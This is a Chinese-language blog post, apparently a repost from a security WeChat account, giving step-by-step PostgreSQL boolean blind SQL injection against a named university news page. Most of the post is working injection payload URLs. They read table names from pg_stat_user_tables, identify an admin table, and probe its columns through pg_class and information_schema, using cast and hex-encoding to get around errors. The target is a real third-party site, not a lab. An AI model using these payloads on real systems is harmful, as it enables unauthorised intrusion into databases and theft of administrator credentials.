PostgreSQL盲注笔记二

  • A+
所属分类:安全文章

好了接下来继续 
好我们有20个表、、、、 
接下来我们来看看、、表是什么 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(relname) from pg_stat_user_tables limit 1 OFFSET 0) between 0 and 128

这句话的意思是看看第一个表的长度是多少 


复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(relname) from pg_stat_user_tables limit 1 OFFSET 0) between 0 and 64   http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select length(relname) from pg_stat_user_tables limit 1 OFFSET 0) between 19 and 19

这两句说明第一个表的长度为:19 

我们接下来看看第一个表的内容是什么 


复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 OFFSET 0) between 0 and 32768  http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 OFFSET 0) between 112 and 120

一样的方法下去我们就能猜到我们的表了、、、只要改变(select ascii(substr(relname,1,1))第一个1为2 
就是说第一个表的第二个字母的内容了即(select ascii(substr(relname,2,1)) 

好我们来看第二个表的内容是什么 
正常:
复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 OFFSET 1) between 112 and 120

这一切和查看第一个表的第一个字母的不同点是什么?? 


复制代码


http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(relname,1,1)) from pg_stat_user_tables limit 1 OFFSET 0) between 112 and 120

没错,我们只要把 OFFSET 0 改为  OFFSET 1即可 

结果我们得到了我们想要的管理表为:publish_admin 

好接下来我们来看看字段是什么、、、先来构造下语句、、 
得到/*得到表名为xxx的oid值*/ 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(oid,1,1)) from pg_class where relname='publish_admin' limit 1 OFFSET 0) between 0 and 32768

显示错误、、、、、可能oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型 

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(cast(oid+as+varchar(10)),1,1)) from pg_class where relname='publish_admin' limit 1 OFFSET 0) between 0 and 3276811 http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(column_name,1,1)) from information_schema.columns where table_name=$publish_admin$ limit 1 OFFSET 0) between 0 and 120

还是错误、、醉了

复制代码

http://www.u-tokyo.ac.jp/news/detail_e.html?id=13072 and (select ascii(substr(column_name,1,1)) from information_schema.columns where table_name=0x7075626C6973685F61646D696E limit 1 OFFSET 0) between 0 and 120



本文始发于微信公众号(飓风网络安全):PostgreSQL盲注笔记二

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: